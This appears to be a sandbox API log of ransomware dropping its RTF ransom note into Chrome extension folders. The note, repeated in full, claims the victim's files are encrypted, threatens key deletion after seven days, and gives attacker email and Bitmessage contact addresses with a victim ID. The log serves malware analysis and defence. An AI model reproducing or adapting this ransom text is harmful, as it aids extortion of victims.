w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.200] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.201] CloseHandle (hObject=0x2ec) returned 1 [0291.201] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\#readme_eman#.rtf")) returned 0xffffffff [0291.201] GetLastError () returned 0x2 [0291.201] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.202] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.202] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me 